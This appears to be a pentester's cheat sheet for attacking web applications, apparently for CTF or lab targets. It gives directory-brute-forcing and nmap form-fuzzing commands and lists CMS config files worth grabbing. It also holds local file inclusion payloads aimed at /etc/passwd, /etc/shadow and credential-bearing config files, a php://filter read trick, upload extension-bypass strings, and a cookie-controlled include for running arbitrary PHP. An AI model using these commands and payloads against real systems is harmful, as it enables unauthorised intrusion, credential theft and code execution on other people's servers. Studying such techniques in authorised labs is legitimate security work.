Good directory discovery tool:

$ git clone https://github.com/maurosoria/dirsearch.git;  cd dirsearch; python3 dirsearch.py  -u http://$ip/ -e .php

Directory discovery

$ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip

Nmap HTTP Form Fuzzer


$ nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip

Nmap Check the server methods


$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip


Test OPTIONS against every folder/file.

Test every GET/POST parameter against SQLI and RCE.

JBoss

JMX Console http://$ip:8080/jmxconcole/
War File

Joomla

configuration.php
diagnostics.php
joomla.inc.php
config.inc.php

Mambo

configuration.php
config.inc.php

Wordpress

setup-config.php
wp-config.php

Test it:

$ fimap -u "http://$ip/example.php?test="

Interesting payloads:

/etc/passwd | /etc/shadow #instant win

/var/www/html/config.php # or similar paths to get SQL etc creds

?page=php://filter/convert.base64-encode/resource=../config.php

../../../../../boot.ini # to find out windows version*

Good password list

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000.txt

Avoid extension checks using tricks like:

.php5.jpeg
.php5%00.jpeg

Different file formats

https://en.wikipedia.org/wiki/List_of_file_signatures

You can usually bypass file include filters with payloads like:

php://filter/convert.base64-encode/resource=file

If you control an include statenent such as

include("lang/".$_COOKIE['lang']);

You can set a cookie pointing to an arbitrary PHP file and have it executed in your page.

Find out potential correct vhost to GET

is the clock skewed

Any names that could be usernames for bruteforce/guessing.

Run strings against every file